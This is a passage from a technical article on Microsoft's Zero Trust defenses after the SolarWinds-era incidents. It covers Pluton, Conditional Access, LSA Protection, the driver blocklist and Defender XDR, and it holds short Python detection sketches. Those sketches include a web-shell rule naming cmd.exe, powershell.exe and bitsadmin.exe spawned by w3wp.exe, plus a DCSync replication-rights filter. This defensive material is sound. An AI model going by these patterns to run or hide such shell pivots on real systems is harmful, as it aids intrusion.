    E --> H

The Microsoft three-principle adoption -- Verify Explicitly, Use Least Privilege, Assume Breach -- runs through Microsoft Build 2022's Zero Trust keynote programming and through the Microsoft Learn Zero Trust overview that codifies the framing as Microsoft documentation [@ms-zt-overview]. Federal adoption became binding in OMB M-22-09 on January 26, 2022 [@omb-m-22-09], which required Federal Civilian Executive Branch agencies to align with SP 800-207 and the CISA Zero Trust Maturity Model by end of FY24, with phishing-resistant multi-factor authentication as the identity-pillar baseline.

Key idea: Zero Trust is not a 2020 invention, and the SolarWinds-HAFNIUM-PrintNightmare-Log4Shell clustering is not what created the architecture. The vocabulary was already on the shelf in August 2020. The thirteen-month incident clustering is what made the vocabulary operative for the Windows industry -- because the incident clustering invalidated four separate assumptions simultaneously, and only an architectural pivot at the perimeter-trust level addressed all four.

The vocabulary existed in August 2020. The receipt arrived in December 2020. Section 6 walks the four Windows-side primitives that operationalized the vocabulary at scale.

6. The Defensive Layer That Shipped at Scale (2021-2023)

Vocabulary becomes architecture only when something ships. Here are the four Windows-side primitives that operationalized Zero Trust between 2021 and 2023.

6.1 Microsoft Pluton: The Hardware Response to a Supply-Chain Class

On November 17, 2020 -- three weeks before Mandiant's SUNBURST disclosure -- David Weston announced the Microsoft Pluton security processor [@weston-2020-pluton]. The announcement named the architectural goal directly. Discrete Trusted Platform Modules sit on the LPC or SPI bus that runs between the CPU package and the motherboard chipset; the bus is observable with a logic analyzer. The 2019 Pulse Security research by Denis Andzakovic [@pulse-tpm-sniffing], the 2021 SCRT reproduction [@scrt-tpm-sniffing], and Henri Nurmi's 2022 WithSecure Labs SPI follow-up [@withsecure-tpm-sniffing] had all demonstrated that the BitLocker Volume Master Key transiting that bus was extractable with a forty-dollar FPGA. Pluton's architectural answer was to eliminate the bus. Place the security processor inside the CPU package, and the BitLocker key never traverses an externally observable trace.

Pluton is not a 2020 design. The same Microsoft Security and Pluton team shipped its first production silicon on the Xbox One in 2013, where the security processor was the anti-piracy and DRM key-storage root of trust. Galen Hunt's team then shipped a Pluton-derived security subsystem on Azure Sphere MCUs from April 2018, where it served as the secure-boot, runtime-attestation, and Microsoft-managed-firmware-update root for the IoT-microcontroller class [@azure-sphere-2018-azure-mirror]. The November 2020 announcement [@weston-2020-pluton] was the commitment to ship a mature security-processor design on general-purpose Windows PCs, not a new design.

Microsoft Pluton. A security processor co-designed by Microsoft, AMD, Intel, and Qualcomm, announced in November 2020 [@weston-2020-pluton] and shipped commercially in May 2022 on Lenovo ThinkPad Z13 and Z16 systems with AMD Ryzen 6000 SoCs. The Lenovo StoryHub press release confirms the ship vehicle ("ThinkPad Z13 will be available from May 2022, starting from $1549" and "ThinkPad Z16 will be available from May 2022, starting from $2099"), and David Weston's CES 2022 Microsoft Windows Experience Blog post of the same day names the same Pluton-on-Ryzen-6000 ThinkPad Z ship vehicle [@lenovo-thinkpad-z-press-jan2022, @pluton-windows-blog-jan2022]. Pluton can operate in three modes: as a TPM 2.0 implementation co-resident on the CPU die (the default on consumer Windows 11 systems where Pluton is enabled), as a security processor alongside a separate discrete TPM, or disabled at the OEM level [@ms-pluton-learn]. The architectural goal is to close the TPM bus-sniffing class by eliminating the external bus, not to add new cryptographic capability beyond what TPM 2.0 already specifies.

flowchart TD
    subgraph DiscreteTPM[Discrete TPM topology]
        A1[CPU package] -- LPC or SPI bus, externally observable --> A2[Discrete TPM chip]
        A2 --> A3[VMK released to CPU at boot]
        A4[Attacker with logic analyzer] -. sniffs bus traffic .-> A1
    end
    subgraph PlutonTopology[Pluton topology]
        B1[CPU package containing Pluton] --> B2[VMK released inside package, no external bus]
        B3[Attacker with logic analyzer] -. nothing to sniff .-> B1
    end

Note: Matthew Garrett's April 2022 analysis of an AMD Ryzen 6000 firmware image documented that the PSP directory entry 0xB, bit 36, is an OEM-controlled toggle that disables Pluton at the firmware level [@mjg59-pluton]. Garrett's analysis confirmed Pluton silicon was present on his test machine and could be disabled by the OEM, not by the end user. The architectural implication is that "the system has a Pluton" and "Pluton is enabled and acting as the TPM" are independent claims, and an enterprise threat model that turns on the latter needs verification, not inference from the former.

The framing the Pluton announcement made explicit is the one that matters in the context of this article. Pluton is the hardware response to a supply-chain class. Discrete TPM was a supply-chain answer for cryptographic identity; the LPC and SPI buses are a supply-chain leak point because they cross a packaging boundary. Pluton closes the leak point by collapsing the boundary. The fact that the announcement landed three weeks before SUNBURST is coincidence; the fact that the two events name the same architectural problem at different layers is not.

6.2 The Windows 11 Hardware Baseline

Windows 11 reached general availability on October 5, 2021 [@win11-introducing]. The new install gate required TPM 2.0 and UEFI Secure Boot [@win11-specs] -- the first mainstream Microsoft operating system to require hardware roots of trust as a precondition for installation. The Windows installer verifies both at the install screen and refuses to proceed on systems that lack them.

The registry workaround at HKLM\SYSTEM\Setup\MoSetup\AllowUpgradesWithUnsupportedTPMOrCPU allows installation on systems with TPM 1.2 or an unsupported CPU model, but only as an in-place upgrade and only with explicit warning that the configuration is unsupported. The workaround is not part of the official install path; it documents the existence of an escape hatch without endorsing it. The architectural claim ("Windows 11 requires TPM 2.0 by official policy") is the operative one for fleet management.

The baseline does not eliminate the bootkit class. BlackLotus, disclosed in 2023, exploited CVE-2022-21894 to defeat Secure Boot on systems that had not patched the underlying bootloader vulnerability [@eset-blacklotus-2023]. The hardware-root-of-trust install gate is a baseline, not a ceiling. What it accomplishes architecturally is a population-level shift: by mid-2024, the median Windows 11 installation has a TPM, has Secure Boot enabled, and has measured boot data that VBS-based defenses (Credential Guard, HVCI) can layer on top of. Credential Guard in particular reached default-enabled status on hardware that meets the requirements in Windows 11 22H2 [@ms-credential-guard].

6.3 Conditional Access, CAE, and the Primary Refresh Token

The cloud-identity defense stack is the primitive that the four incidents most directly produced. Three components compose it, with explicit period-correct naming.

Conditional Access. Microsoft's Zero Trust policy engine for Microsoft Entra ID (formerly Azure AD) [@ms-conditional-access]. A Conditional Access policy is an if-then statement that takes signals (user identity, group memberships, device compliance state, location, sign-in risk score, application being accessed) and produces an enforcement decision (allow, require multi-factor, require compliant device, block). Conditional Access policies act as the Policy Decision Point in the NIST SP 800-207 architecture; the resource being accessed acts as the Policy Enforcement Point.

Continuous Access Evaluation (CAE). The mechanism by which a resource server can be informed mid-session that the user's risk state has changed and the existing access token should be re-evaluated [@ms-cae]. CAE is Microsoft's implementation of the OpenID Continuous Access Evaluation Profile (CAEP) [@openid-caep-spec], a Shared Signals and Events Framework standard. The Microsoft Learn CAE documentation describes critical-event evaluation as near real-time with up to fifteen minutes of event-propagation delay for some signals; IP-location policy enforcement propagates instantly [@ms-cae]. The initial supported relying parties are Exchange Online, SharePoint Online, and Teams [@ms-cae].

Primary Refresh Token (PRT). A long-lived authentication artifact issued by Microsoft Entra ID to first-party token brokers on Microsoft Entra joined and hybrid-joined devices [@ms-prt]. The PRT enables single sign-on across the applications used on those devices. The PRT's session key is non-exportable: on TPM-enabled devices the key is bound to the TPM and cannot be extracted from the machine. The PRT is the artifact that makes "compliant device" a meaningful signal in Conditional Access policies, because possession of a valid PRT cryptographically demonstrates the user is signing in from the specific device the PRT was issued to.
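The if-then shape of a Conditional Access policy can be sketched in a few lines. This is a toy model rather than the Entra policy engine: the `Signals` fields, the `evaluate` function, the `finance-portal` app name, and the rule ordering are all hypothetical, chosen only to show signals going in and an enforcement decision coming out.

```python
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    REQUIRE_MFA = "require_mfa"
    REQUIRE_COMPLIANT_DEVICE = "require_compliant_device"
    BLOCK = "block"


@dataclass(frozen=True)
class Signals:
    """Inputs to the decision; field names are illustrative only."""
    user: str
    groups: frozenset
    device_compliant: bool
    country: str
    sign_in_risk: str  # "low", "medium", or "high"
    app: str


def evaluate(s: Signals) -> Decision:
    """Toy Policy Decision Point: the first matching rule wins."""
    if s.sign_in_risk == "high":
        return Decision.BLOCK
    if s.app == "finance-portal" and not s.device_compliant:
        return Decision.REQUIRE_COMPLIANT_DEVICE
    if s.sign_in_risk == "medium" or "admins" in s.groups:
        return Decision.REQUIRE_MFA
    return Decision.ALLOW
```

First-match evaluation is a simplification made for readability. Real Conditional Access combines every policy that applies to a sign-in, so a production model would collect all matching controls rather than stop at the first rule.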

The "Azure AD" to "Microsoft Entra ID" rename history matters for citations and for tooling. Azure AD was the canonical name through July 11, 2023; the Microsoft Entra family umbrella was introduced on May 31, 2022 (Vasu Jakkal's Microsoft Security Blog post "Secure access for a connected world--meet Microsoft Entra" naming Azure AD, Cloud Infrastructure Entitlement Management, and decentralized identity as the initial family members [@ms-entra-launch-may2022]) but applied only to specific product families at that point; the Azure AD-to-Entra ID rename was July 11, 2023 [@ms-entra-rebrand]. Documentation written in 2021-2022 uses "Azure AD" throughout; documentation written after July 2023 uses "Microsoft Entra ID" throughout. Both names refer to the same product.

flowchart LR A[User on Entra-joined device] --> B[Device requests PRT, TPM-bound session key] B --> C[Entra ID issues PRT] C --> D[App access request, includes PRT-derived access token] D --> E[Conditional Access policy engine, the PDP] E --> F{"Signals, identity, device, location, risk score"} F --> G[Decision: allow, MFA, block] G --> H[Resource server, the PEP] H --> I[CAE channel back to Entra] I --> J[Risk-event signal triggers re-evaluation] J --> E

Together, the three primitives operationalize the Zero Trust framing in the Microsoft cloud-identity layer. Conditional Access decides at the PDP; CAE keeps the decision live after the initial sign-in; the PRT with TPM hardware binding makes the device-identity signal cryptographically meaningful rather than reputational. Microsoft Entra ID Protection layers risk-based signal-scoring on top, with detections for anomalous tokens, atypical travel patterns, and suspicious multi-factor approval flows [@ms-identity-protection-risks].
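On the client side, CAE re-evaluation shows up as a `401` response whose `WWW-Authenticate` header carries a claims challenge. The sketch below assumes the header uses the `error="insufficient_claims"` marker with a base64-encoded `claims` parameter; `parse_claims_challenge` is a hypothetical helper, not part of any Microsoft SDK, and a real client would normally let its authentication library handle this step.

```python
import base64
import json
import re

# Matches key="value" pairs inside a WWW-Authenticate header.
_PARAM = re.compile(r'(\w+)="([^"]*)"')


def parse_claims_challenge(www_authenticate: str):
    """Return the decoded claims request from a 401 challenge, or None.

    None means the 401 is an ordinary authentication failure rather than
    a request to re-authenticate with additional claims.
    """
    params = dict(_PARAM.findall(www_authenticate))
    if params.get("error") != "insufficient_claims" or "claims" not in params:
        return None
    raw = params["claims"]
    padded = raw + "=" * (-len(raw) % 4)  # tolerate stripped padding
    return json.loads(base64.b64decode(padded))
```

A client that receives a non-`None` result would pass the decoded claims back to the identity provider when requesting a fresh token, which is how the resource server's rejection turns into a new Conditional Access evaluation.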

6.4 LSA Protection and the Vulnerable Driver Blocklist

The fourth Windows-side primitive is the pair of defaults that landed in 2022-2023 against credential-theft and bring-your-own-vulnerable-driver attacks respectively.

LSA Protection. A Windows mechanism, introduced as an opt-in feature on Windows 8.1 and Windows Server 2012 R2 [@ms-lsa-protection], that runs the Local Security Authority subsystem (`lsass.exe`) as a Protected Process Light. The PPL status prevents non-PPL processes (including those running as SYSTEM) from opening LSASS with the access rights required for memory inspection or code injection. Mimikatz-style credential extraction from LSASS memory becomes unavailable to malware running outside the PPL trust level. The Microsoft Learn Windows 11 Security Book confirms the current default behavior: "LSA protection is enabled by default on all devices to help safeguard credentials. For new installations, it activates immediately. For upgrades, it becomes active after a five-day evaluation period followed by a system reboot" [@ms-win11-credprot-book] -- the audit-then-enforce rollout pattern that turned the opt-in 2013-era control into a default-on Windows 11 22H2 primitive; systems flagged as incompatible during the evaluation period remain opt-in.

Bring Your Own Vulnerable Driver (BYOVD). An attack pattern in which the attacker installs a *legitimately signed* third-party kernel driver that contains a known vulnerability, then exploits the driver's vulnerability to obtain kernel-mode code execution. The attacker thereby converts a userspace foothold into a kernel-mode foothold without writing kernel code that would have to pass Microsoft's signing process. The Vulnerable Driver Blocklist [@ms-driver-blocklist] is Microsoft's curated list of drivers known to be exploitable for BYOVD; Microsoft's KB5020779 -- titled "The vulnerable driver blocklist after the October 2022 preview release" -- states explicitly that "Starting with Windows 11, version 22H2, the blocklist is also enabled by default on all devices" [@ms-kb5020779-driverblocklist], anchoring both the October 2022 servicing milestone and the 22H2 default-on rollout. Community catalogs like LOLDrivers [@loldrivers] track the broader population.

The defaults matter precisely because the opt-in posture from 2013 onward did not produce population-level coverage. LSA Protection had been available for nine years before it shipped as a default; Vulnerable Driver Blocklist was available as a WDAC policy for several years before the default. The change in 2022-2023 is not the existence of the controls but the population they cover by default. Windows 11 22H2 fleets in 2024-2026 are the first Windows population in which a meaningful fraction of installs are LSA-Protected at sign-in and blocking the canonical BYOVD drivers at kernel-load time, on the default install path, without an administrator having configured the feature.
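Because the point is population-level coverage, it helps to measure it rather than assume it. The sketch below classifies an endpoint from a snapshot of two registry values: `RunAsPPL` under the `Lsa` key and `VulnerableDriverBlocklistEnable` under the `CI\Config` key. The snapshot format (a dict keyed by key path and value name) and the `audit_endpoint` helper are assumptions made for illustration; collecting the values from real machines is out of scope here.

```python
LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
CI_KEY = r"SYSTEM\CurrentControlSet\Control\CI\Config"


def audit_endpoint(snapshot: dict) -> dict:
    """Classify one endpoint from a {(key_path, value_name): int} snapshot.

    A missing value is treated as "not configured". That may under-report
    on builds where the feature is on by default without an explicit value,
    so treat a False result as a prompt to verify, not as proof.
    """
    run_as_ppl = snapshot.get((LSA_KEY, "RunAsPPL"), 0)
    blocklist = snapshot.get((CI_KEY, "VulnerableDriverBlocklistEnable"), 0)
    return {
        # 1 = enabled with UEFI lock, 2 = enabled without UEFI lock
        "lsa_protection": run_as_ppl in (1, 2),
        "driver_blocklist": blocklist == 1,
    }


def coverage(fleet: dict) -> float:
    """Fraction of endpoints with both controls configured on."""
    if not fleet:
        return 0.0
    ok = sum(all(audit_endpoint(s).values()) for s in fleet.values())
    return ok / len(fleet)
```

Run across an inventory export, `coverage` gives the fraction of the fleet where both controls are explicitly on, which is the number the default-on argument is really about.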

These four primitives -- Pluton at silicon, the Windows 11 hardware baseline at the OS install gate, Conditional Access with CAE and PRT at the cloud-identity layer, LSA Protection and Vulnerable Driver Blocklist as defaults on the endpoint -- are coherent if and only if they are layered. The fifth primitive, the Defender XDR composition plane, is what makes them layerable in practice.

6.5 Microsoft Defender XDR: The Composition Primitive

No single Defender product covers the full attack chain of any of the four 2020-2021 incidents. SUNBURST touches the endpoint, on-premises Active Directory, ADFS, and Microsoft 365 in sequence. ProxyLogon touches the IIS worker process, the file system, and downstream Exchange mailboxes. PrintNightmare touches the Spooler RPC interface on a Domain Controller. Log4Shell touches a Java application's process tree on Windows. The detection telemetry for each lives in a different product surface.

Microsoft Defender XDR. The unified incident-correlation and advanced-hunting plane that consolidates four Defender products into a single security operations surface at `security.microsoft.com`. The four products are Microsoft Defender for Endpoint (workstation and server EDR), Microsoft Defender for Identity (on-premises Active Directory and ADFS detection) [@ms-defender-identity-creds], Microsoft Defender for Cloud Apps (cloud-session anomaly detection) [@ms-defender-cloud-apps-anomaly], and Microsoft Defender for Office 365 (email and collaboration phishing detection). XDR contributes three primitives the individual products cannot provide on their own: a common Kusto Query Language advanced-hunting schema across the four telemetry streams, incident correlation that groups alerts across products into a single cross-domain incident, and Automated Investigation and Response playbooks that span product boundaries.

The architectural role of each product against the article's incident set is specific.

Defender for Identity sources from Domain Controller event streams and from ADFS event logs. Its load-bearing detections against the SolarWinds-class follow-on are the SACL-based DCSync detection (which audits the three Directory-Replication-Get-Changes extended-rights GUIDs against AD event 4662 for non-DC principals) and the Golden SAML composite signal, which fuses an ADFS-anomaly alert with a downstream cloud-session anomaly and an Entra ID Protection risk-score elevation into a single correlated incident [@ms-defender-identity-creds]. The on-premises attack and the cloud-side forged-token consequence get joined in one investigation rather than two.
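The DCSync half of that detection reduces to a filter over directory-access audit events. The sketch below is not Defender for Identity's implementation; it assumes events have already been parsed into dicts with hypothetical `event_id`, `subject`, and `properties` fields, and it flags event 4662 records that reference any of the three replication extended-rights GUIDs when the requesting principal is not a known Domain Controller account.

```python
# Extended-rights GUIDs for the three directory-replication permissions.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}


def dcsync_candidates(events, dc_accounts):
    """Return 4662 events that exercise replication rights from non-DC principals."""
    dcs = {account.lower() for account in dc_accounts}
    hits = []
    for event in events:
        if event.get("event_id") != 4662:
            continue
        props = event.get("properties", "").lower()
        if not any(guid in props for guid in REPLICATION_GUIDS):
            continue
        if event.get("subject", "").lower() in dcs:
            continue  # legitimate DC-to-DC replication
        hits.append(event)
    return hits
```

The allow-list of Domain Controller accounts is the fragile input: an incomplete list produces false positives, and a compromised DC account is invisible to this filter by construction.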

Defender for Endpoint carries the canonical ProxyLogon-class fingerprint: the IIS worker process w3wp.exe spawning cmd.exe, powershell.exe, cscript.exe, or bitsadmin.exe as a direct child [@ms-webshell-hunting-2021-feb]. The fingerprint generalizes beyond Exchange. The same parent-child shape, with the relevant web-server or application-server process in the parent position, is the canonical web-shell pivot for ProxyShell against Exchange Server, for OGNL injection against Atlassian Confluence, and for any Java application-server exploitation against Tomcat on Windows in which the post-exploitation step drops a shell. One detection pattern, multiple incident classes.
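The parent-child fingerprint is simple enough to express as a predicate over process-creation events. This is a minimal sketch, not the Defender for Endpoint rule: `is_webshell_pivot` and its `parents` parameter are hypothetical, and the default parent set contains only the IIS worker process named above.

```python
SUSPICIOUS_CHILDREN = frozenset(
    {"cmd.exe", "powershell.exe", "cscript.exe", "bitsadmin.exe"}
)


def _image_name(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX-style image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_webshell_pivot(parent_image: str, child_image: str,
                      parents=frozenset({"w3wp.exe"})) -> bool:
    """True when a web-server process directly spawns a shell or LOLBin."""
    return (_image_name(parent_image) in parents
            and _image_name(child_image) in SUSPICIOUS_CHILDREN)
```

Passing a different `parents` set is how the same predicate would be pointed at another server process; which process names belong in that set for a given product is a deployment decision this sketch does not make.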

Defender for Cloud Apps runs the anomaly-detection plane against cloud sessions [@ms-defender-cloud-apps-anomaly]. The seven-day learning window builds a per-user behavioral baseline; subsequent sessions are scored against the baseline across impossible-travel, geographic deviation, device-fingerprint deviation, claim-set deviation, and token-lifetime deviation axes. The architectural significance against Storm-0558-class incidents is precisely that the cryptographic verification path will (by definition) accept a token forged with a stolen signing key -- so the catch has to happen at the behavioral layer rather than the signature layer. Defender for Cloud Apps is the heuristic anomaly net under the cryptographic floor.
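Of the scoring axes listed, impossible travel is the easiest to make concrete. The sketch below computes great-circle distance between two sign-ins and flags the pair when the implied speed exceeds a threshold. The `SignIn` type, the 900 km/h ceiling, and the 50 km noise floor are assumptions for illustration; they are not Defender for Cloud Apps' actual parameters, and the real product scores against a learned per-user baseline rather than a fixed cutoff.

```python
import math
from dataclasses import dataclass
from datetime import datetime

EARTH_RADIUS_KM = 6371.0


@dataclass(frozen=True)
class SignIn:
    lat: float
    lon: float
    when: datetime


def haversine_km(a: SignIn, b: SignIn) -> float:
    """Great-circle distance between two sign-in locations."""
    phi1, phi2 = math.radians(a.lat), math.radians(b.lat)
    dphi = phi2 - phi1
    dlmb = math.radians(b.lon - a.lon)
    h = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(h))


def is_impossible_travel(a: SignIn, b: SignIn,
                         max_kmh: float = 900.0, min_km: float = 50.0) -> bool:
    """Flag two sign-ins whose implied speed exceeds max_kmh."""
    dist = haversine_km(a, b)
    if dist < min_km:  # ignore geolocation jitter within one metro area
        return False
    hours = abs((b.when - a.when).total_seconds()) / 3600
    if hours == 0:
        return True  # far apart at the same instant
    return dist / hours > max_kmh
```

A forged token replayed from attacker infrastructure passes signature validation but still has to come from somewhere, which is why a geometric check like this can fire when the cryptographic check cannot.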

Defender for Office 365 runs the upstream-vector layer for email and collaboration spearphishing -- the operator-pre-exploitation phase common to SolarWinds-class and HAFNIUM-class operations where the actor builds initial reconnaissance and credential access before reaching the production network. Its role in the article's incident set is preventive rather than detective: closing the recon entry path before the lateral-movement phase has a chance to begin.

flowchart TD A[Defender for Endpoint] --> E[Common KQL advanced-hunting schema] B[Defender for Identity] --> E C[Defender for Cloud Apps] --> E D[Defender for Office 365] --> E E --> F[Incident correlation engine] F --> G[Cross-domain incidents] G --> H[Automated Investigation and Response] H --> I[Cross-product remediation playbooks]

The canonical example of why XDR is the composition primitive: the SUNBURST chain produces a Defender for Endpoint network-beacon alert on the customer's Orion server (the SUNBURST DGA C2 callback), a Defender for Identity ADFS-token-extraction alert when the attacker takes the token-signing key off the ADFS host, a Defender for Cloud Apps Golden-SAML-pivoted session alert when the forged token authenticates against Exchange Online, and an Entra ID Protection forged-token sign-in alert with an anomalous claim set. Four product-level alerts. One real incident. Without the correlation plane, the alerts arrive as four separately triaged tickets; with it, they arrive as one investigation.
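The grouping step can be approximated as connected components over shared entities: two alerts belong to the same incident if they reference a common host, account, or token issuer, directly or through a chain of other alerts. The sketch below uses a small union-find for that. The alert shape (`id` plus a set of `entities` strings) is hypothetical, and Defender XDR's real correlation logic is considerably richer than entity overlap.

```python
def correlate(alerts):
    """Group alert ids into incidents by transitive entity overlap."""
    parent = list(range(len(alerts)))

    def find(i):
        # Path-halving find.
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    first_seen = {}  # entity -> index of the first alert that mentioned it
    for i, alert in enumerate(alerts):
        for entity in alert["entities"]:
            if entity in first_seen:
                parent[find(i)] = find(first_seen[entity])
            else:
                first_seen[entity] = i

    incidents = {}
    for i, alert in enumerate(alerts):
        incidents.setdefault(find(i), []).append(alert["id"])
    return sorted(incidents.values())
```

Fed four alerts that share an account, an issuer, and a user in sequence, the function returns one incident containing all four, plus a separate incident for any unrelated alert.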

The framing the §6 architecture lands on is that the composition is structurally necessary. No 2020-2021 incident is covered by one of the five primitives alone. The 2022-2023 step forward is that all five primitives ship at scale; the load-bearing architectural argument is that none of them is sufficient in isolation. The next section walks the three competing architectural positions that determine how they are layered in practice.

7. Three Live Zero Trust Specifications

There is not one Zero Trust architecture in 2024-2026. There are three, and they are not interchangeable. Each closes a different gap; none closes all three.

Microsoft full-stack Zero Trust. The Microsoft posture is tightly integrated: Microsoft Entra ID for identity, Defender XDR for endpoint and cloud telemetry, Intune for device management, Purview for data classification, with Conditional Access as the policy engine that ties them together [@ms-zt-overview, @ms-zt-learn]. Microsoft Inside Track's published case study describes Microsoft's own seven-year internal transformation along this stack, anchored on four canonical scenarios: phishing-resistant MFA everywhere, device health attested before access, pervasive telemetry, and least-privilege enforcement [@ms-zt-at-microsoft]. Microsoft's deployment guide hub organizes the architecture along six pillars (Identity, Endpoints, Applications, Data, Infrastructure, Networks). Microsoft maintains a customer-stories portal at customers.microsoft.com with published case studies across consumer-goods, financial-services, healthcare, and public-sector cohorts. The case for the full-stack posture: operational coherence, integrated telemetry across identity and device, one policy plane to reason about. The case against: single-vendor risk, which SolarWinds made acutely concrete -- a posture in which one vendor supplies your operating system, identity provider, endpoint, and cloud productivity stack is architecturally homogeneous in exactly the way SUNBURST taught the industry to interrogate.

Best-of-breed multi-vendor. The third-party alternative composes an identity-as-a-service provider (Okta or Ping Identity), a third-party EDR (CrowdStrike Falcon or SentinelOne), a Secure Service Edge or Secure Web Gateway (Palo Alto Prisma or Zscaler), and a separate SIEM and SOAR for telemetry and orchestration. Okta's customer-stories portal positions itself around a "two-thirds of the Fortune 100" framing [@okta-customers]; the multi-vendor cohort spans Fortune 500 deployments across logistics, telecom, hospitality, and retail, with case studies on Okta's per-customer pages [@okta-customers]. The case for: cross-vendor coverage of the supply-chain class, on the principle that two independent vendor failures are less correlated than one. The case against: operational complexity, integration burden, and the recursive observation that any third-party vendor on the trusted-publisher list is itself a SolarWinds-style trust assumption -- the multi-vendor posture distributes the risk rather than eliminating it.

Both Microsoft's and Okta's customer-stories portals are organized by industry segment and per-customer case-study URL; specific named-customer cohorts vary as case studies are added, retired, or refreshed, so this article keeps the cohort framing at the industry-segment level rather than enumerating a fixed list of named brands [@ms-zt-at-microsoft, @okta-customers].

Federal Zero Trust (CISA ZTMM v2.0 and the OMB M-22-09 baseline). CISA published the Zero Trust Maturity Model v2.0 in April 2023 [@cisa-ztmm-v2]. The model defines a vendor-neutral architecture across five pillars (Identity, Devices, Networks, Applications and Workloads, Data) with three cross-cutting capabilities (Visibility and Analytics, Automation and Orchestration, Governance) and four maturity stages (Traditional, Initial, Advanced, Optimal). OMB Memorandum M-22-09 set the FY24 implementation baseline [@omb-m-22-09]. The DHS-specific operationalization, CISA Zero Trust Architecture Implementation, was published in January 2025 as the playbook for the department-level rollouts [@dhs-zta-impl]. The GAO audit GAO-24-106343 reported in March 2024 that the lead-implementation agencies (CISA, NIST, OMB) had fully completed 49 of 55 EO 14028 requirements, partially completed 5, with one not applicable [@gao-24-106343]. The SEC Office of Inspector General's September 2023 Final Management Letter is the canonical published example of an agency-level M-22-09 readiness review [@sec-oig-zt-mgmt-letter]. The case for: auditability, procurement neutrality, alignment with the federal mandate, and a measurable scorecard. The case against: it is a maturity model rather than an architectural specification, and adoption pace across federal civilian agencies has lagged the FY24 target the OMB memo set.

Pillar / Cost dimension	Microsoft full-stack	Best-of-breed multi-vendor	Federal CISA ZTMM v2.0
Trust root	Microsoft Entra ID + Microsoft Pluton	Mixed (Okta or Ping for SAML, third-party EDR)	Vendor-neutral; agency choice within five pillars
Identity plane	Entra ID with Conditional Access, CAE, PRT	Okta or Ping with SAML to downstream apps	Identity pillar with phishing-resistant MFA baseline
Endpoint	Defender for Endpoint	CrowdStrike Falcon or SentinelOne	Devices pillar; agency-selected EDR
Network	Microsoft Global Secure Access	Palo Alto Prisma or Zscaler	Networks pillar; SASE neutral
Integration FTE estimate	Low to medium (single-vendor APIs)	High (cross-vendor API integration)	Medium to high (M-22-09 compliance overhead)
Vendor supply-chain blast radius	Concentrated at one vendor	Distributed across four-plus vendors	Distributed; auditability primary

Microsoft was a SolarWinds Orion customer. Microsoft was one of the roughly one hundred victims of the SUNBURST follow-on phase. The MSRC final investigation update of February 18, 2021 documented the actor's late-November 2020 first viewing of files in source repositories, with continued attempts at access into early January 2021 [@msrc-solorigate-final]. The report named the targeted product families -- a small subset of Azure, Intune, and Exchange source-code repositories -- and confirmed no evidence of access to production services or customer data. Microsoft's own written conclusion was instructive: defense-in-depth protections prevented the actor from acquiring privileged credentials or executing SAML-token-forgery against Microsoft's corporate domains, and "in deployments that connect on-premises infrastructure to the cloud, organizations can delegate trust to on-premises components ... this creates an additional seam that organizations need to secure."

The best-of-breed multi-vendor argument is most concretely supported by Microsoft's own post-incident analysis, not by any third-party advocacy. A Zero Trust posture in which the policy engine and the operating system and the identity provider share a vendor -- and that vendor was itself a follow-on victim of a supply-chain compromise that targeted its source repositories -- needs to interrogate the assumption that one vendor's defense-in-depth is the load-bearing primitive. The Microsoft public conclusion is that defense-in-depth held; the structural observation the post-mortem invites is that "no single vendor should be the trust anchor for the policy engine that defends against vendor compromise."

Per-vendor licensing is the visible cost. The hidden cost is the engineering FTE the organization needs to maintain the integration graph between products: SCIM provisioning between IdP and downstream apps; SIEM connector maintenance across product versions; cross-product alert-correlation logic that the XDR composition plane handles for free in the Microsoft full-stack but has to be built from scratch in the best-of-breed posture. Federal cohort budgets generally absorb this via a dedicated cybersecurity-modernization line item that commercial Zero Trust pilots rarely receive. The integration-FTE cost is the most under-discussed input to the three-position choice.

All three are responses to the same incident clustering; none of them closes the structural ceiling the next section names.

8. What Even Perfect Execution Cannot Reach

If the four 2020-2021 incidents broke four engineering assumptions, the three bounds in this section are not engineering. They are mathematics and architecture.

Thompson's "Trusting Trust." A compiler that compiles itself can embed a backdoor that survives indefinitely with no trace in any audited source [@thompson-1984-acm, @thompson-nakamoto-reading]. SLSA addresses the visibility problem (what is in your supply chain) by attesting to build steps and provenance [@slsa-v1-levels]. SBOM addresses the composition problem (what components are in your artifact) by inventorying dependencies. Neither addresses the trust problem (what your supply-chain participants chose to do at points the attestations do not cover). SLSA Build Level 3 hardens the build platform; the hardened build platform's own toolchain is still an implicit trust root, and an attacker who compromises the toolchain at a layer below the attestation produces attested artifacts that are nevertheless malicious. The 1984 bound is not closed by 2026 supply-chain tooling.

Rice's Theorem. A foundational result in computability theory (Henry Rice, 1953) stating that for any non-trivial semantic property of programs, no algorithm decides whether an arbitrary program has that property. The theorem bounds what static analysis of program behavior can achieve: no analyzer can decide, in general, whether a program will exfiltrate data, alter records, escalate privileges, or otherwise perform a given semantic action. Fred Cohen's 1984 "Computer Viruses: Theory and Experiments" applied the same bound to malware detection [@cohen-1984-virus]: no general algorithm can decide whether a program is a virus. SBOM tells you *what* is running; Rice's Theorem says no general analyzer can tell you whether what is running is safe.

Cohen 1984 and Rice's Theorem. SBOM data, combined with vulnerability databases, can answer "do we have a known-vulnerable component?" -- and Log4Shell IR proved that answer's value. SBOM cannot answer "is the component we have behaving safely?" -- and the post-Log4Shell follow-on CVEs proved that gap's reality. The composition is decidable; the semantics is not. Rice's Theorem is the bound on what an SBOM-plus-CVE-database posture can detect at scale.
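The decidable half is ordinary set matching, which is why it scales. The sketch below checks a component inventory against a list of advisories with affected version ranges. The SBOM and advisory shapes are hypothetical simplifications (real SPDX or CycloneDX documents and real advisory feeds carry far more structure), and versions are assumed to be purely numeric dotted strings. The two advisories use the published fix versions for the original Log4Shell CVE and its first follow-on.

```python
def parse_version(version: str) -> tuple:
    """Parse a purely numeric dotted version such as "2.14.1"."""
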